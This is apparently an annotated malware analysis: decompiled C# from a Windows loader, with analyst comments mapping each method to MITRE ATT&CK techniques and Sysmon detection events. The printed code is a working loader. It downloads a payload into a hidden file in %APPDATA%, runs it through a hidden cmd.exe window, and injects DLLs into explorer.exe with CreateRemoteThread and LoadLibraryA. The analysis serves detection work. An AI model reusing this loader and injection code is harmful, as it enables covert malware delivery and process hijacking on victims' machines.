// Token: 0x060001D3 RID: 467 RVA: 0x0000EB20 File Offset: 0x0000CD20
/// <summary>
/// Analyst note: remote-thread DLL injection (MITRE ATT&amp;CK T1055.001). Writes the path in
/// <paramref name="string_0"/> into the process <paramref name="process_0"/> and starts a thread
/// there whose entry point is kernel32!LoadLibraryA with that path as its argument.
/// </summary>
/// <param name="string_0">Path string copied into the target; the caller visible in this file passes a DLL path under %APPDATA%.</param>
/// <param name="process_0">Target process; only its <c>Id</c> is used.</param>
/// <returns>Always 0. No API result is checked, so the return value says nothing about success.</returns>
/// <remarks>
/// The Class20 P/Invoke declarations are not visible here; the names match the kernel32 exports
/// and are assumed to map to them (TODO confirm against the extern declarations).
/// Detection: cross-process handle open with access mask 0x43A followed by VirtualAllocEx /
/// WriteProcessMemory / CreateRemoteThread (Sysmon Event ID 10 ProcessAccess and Event ID 8
/// CreateRemoteThread), then an image load of the written path in the target (Event ID 7).
/// </remarks>
public static int smethod_1(string string_0, Process process_0)
{
    // 1082 == 0x43A == PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ |
    // PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION. The handle is never closed in this method.
    IntPtr intptr_ = Class20.OpenProcess(1082, false, process_0.Id);
    // Address of LoadLibraryA resolved in the *current* process and reused as the remote start address.
    IntPtr procAddress = Class20.GetProcAddress(Class20.GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    // 12288 == 0x3000 == MEM_COMMIT | MEM_RESERVE; 4 == PAGE_READWRITE (data page, not executable).
    IntPtr intPtr = Class20.VirtualAllocEx(intptr_, IntPtr.Zero, (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), 12288U, 4U);
    UIntPtr uintPtr;
    // The path is encoded with the system ANSI code page (Encoding.Default), matching the "A" variant of LoadLibrary.
    Class20.WriteProcessMemory(intptr_, intPtr, Encoding.Default.GetBytes(string_0), (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), out uintPtr);
    // Remote thread: start address = LoadLibraryA, parameter = remote buffer holding the path.
    Class20.CreateRemoteThread(intptr_, IntPtr.Zero, 0U, procAddress, intPtr, 0U, IntPtr.Zero);
    return(0);
}
// Token: 0x060001DD RID: 477 RVA: 0x0000EC58 File Offset: 0x0000CE58
/// <summary>
/// Analyst note: environment check. Reports whether the current process runs under WOW64
/// (a 32-bit process on 64-bit Windows), as reported by IsWow64Process.
/// </summary>
/// <returns>
/// The WOW64 flag when the OS version is 5.1 or later and the IsWow64Process call succeeds;
/// otherwise <c>false</c>.
/// </returns>
/// <remarks>
/// Class20.IsWow64Process is assumed to be the kernel32 P/Invoke (declaration not visible here).
/// No caller of this method is visible in this excerpt.
/// </remarks>
public static bool smethod_4()
{
    // Version gate: 5.x with minor >= 1, or any major version >= 6.
    if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6)
    {
        bool result;
        using (Process currentProcess = Process.GetCurrentProcess())
        {
            bool flag;
            // A failed API call is folded into "false" rather than surfaced.
            if (!Class20.IsWow64Process(currentProcess.Handle, out flag))
            {
                result = false;
            }
            else
            {
                result = flag;
            }
        }
        return(result);
    }
    return(false);
}
// Token: 0x060001D4 RID: 468 RVA: 0x0000EBE0 File Offset: 0x0000CDE0
/// <summary>
/// Analyst note: injection target selection. Chooses a host process and hands it, together with
/// the path in <paramref name="string_0"/>, to <c>smethod_1</c>.
/// </summary>
/// <param name="string_0">Path forwarded unchanged to <c>smethod_1</c>.</param>
/// <remarks>
/// Preferred target is the first process named "explorer"; if none exists, a process is picked
/// from the full process list by a random index.
/// Detection: explorer.exe (or an arbitrary process) receiving a remote thread and then loading
/// a module from the user's roaming AppData folder is the visible outcome of this path.
/// </remarks>
public static void smethod_2(string string_0)
{
    try
    {
        Process process_;
        if (Process.GetProcessesByName("explorer").Length != 0)
        {
            // The process list is queried a second time here rather than reusing the first result.
            process_ = Process.GetProcessesByName("explorer")[0];
        }
        else
        {
            int maxValue = Process.GetProcesses().Length;
            // Random.Next(1, maxValue): lower bound inclusive, upper bound exclusive, so index 0 is never chosen.
            int num = new Random().Next(1, maxValue);
            // Second snapshot of the process list; it may differ from the one used to compute maxValue.
            process_ = Process.GetProcesses()[num];
        }
        Class20.smethod_1(string_0, process_);
        // bool_0 is a Class20 static declared outside this excerpt. It is set whenever smethod_1
        // returns without throwing; smethod_1's return value is ignored.
        Class20.bool_0 = true;
    }
    catch
    {
        // Every exception is swallowed: a failure leaves no trace in this method and bool_0 unchanged.
    }
}
// Token: 0x060001D2 RID: 466 RVA: 0x0000E950 File Offset: 0x0000CB50
/// <summary>
/// Analyst note: download-and-execute stage (MITRE ATT&amp;CK T1105, T1564.001, T1059.003).
/// Fetches <paramref name="string_0"/> into the roaming AppData folder under the name
/// <paramref name="string_1"/>, marks the file Hidden, then either runs it (".exe") or passes
/// its path to <c>smethod_2</c> for injection (".dll").
/// </summary>
/// <param name="string_0">Download address handed to <c>WebClient.DownloadFile</c>; an empty string makes the method a no-op.</param>
/// <param name="string_1">File name appended to the AppData path. Only its suffix is inspected; any other suffix does nothing.</param>
/// <remarks>
/// <paramref name="string_1"/> is concatenated into the path and into the cmd.exe argument
/// without any validation visible in this method.
/// Detection: a file created and set Hidden directly under %APPDATA% (Sysmon Event ID 11),
/// an outbound fetch from the same process (Event ID 3), and cmd.exe started with
/// "/c &lt;AppData path&gt;" and a hidden window (Event ID 1).
/// </remarks>
public static void smethod_0(string string_0, string string_1)
{
    // Environment.SpecialFolder.ApplicationData is the per-user roaming profile folder (%APPDATA%).
    string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
    if (string_0 != "")
    {
        // Suffix test is case-sensitive: ".EXE" would not match this branch.
        if (string_1.EndsWith(".exe"))
        {
            try
            {
                // Remove any earlier copy with the same name; a failed delete is ignored.
                if (File.Exists(folderPath + "\\" + string_1))
                {
                    try
                    {
                        File.Delete(folderPath + "\\" + string_1);
                    }
                    catch
                    {
                    }
                }
                using (WebClient webClient = new WebClient())
                {
                    webClient.DownloadFile(string_0, folderPath + "\\" + string_1);
                }
                // Hidden attribute keeps the file out of default Explorer listings.
                File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
                string str = folderPath + "\\" + string_1;
                // Launch is indirect: cmd.exe is the child process and the downloaded file is its "/c" argument.
                Process.Start(new ProcessStartInfo
                {
                    UseShellExecute = true,
                    WorkingDirectory = "C:\\Windows\\System32",
                    FileName = "C:\\Windows\\System32\\cmd.exe",
                    Arguments = "/c " + str,
                    WindowStyle = ProcessWindowStyle.Hidden
                });
                return;
            }
            catch
            {
                // Download or launch failures are silently dropped.
                return;
            }
        }
        if (string_1.EndsWith(".dll"))
        {
            if (File.Exists(folderPath + "\\" + string_1))
            {
                try
                {
                    File.Delete(folderPath + "\\" + string_1);
                }
                catch
                {
                }
            }
            try
            {
                using (WebClient webClient2 = new WebClient())
                {
                    webClient2.DownloadFile(string_0, folderPath + "\\" + string_1);
                }
                File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
                // The DLL is not loaded locally; its path goes to smethod_2, which selects a host process.
                Class20.smethod_2(folderPath + "\\" + string_1);
            }
            catch
            {
                // Failures on the DLL path are also swallowed.
            }
        }
    }
}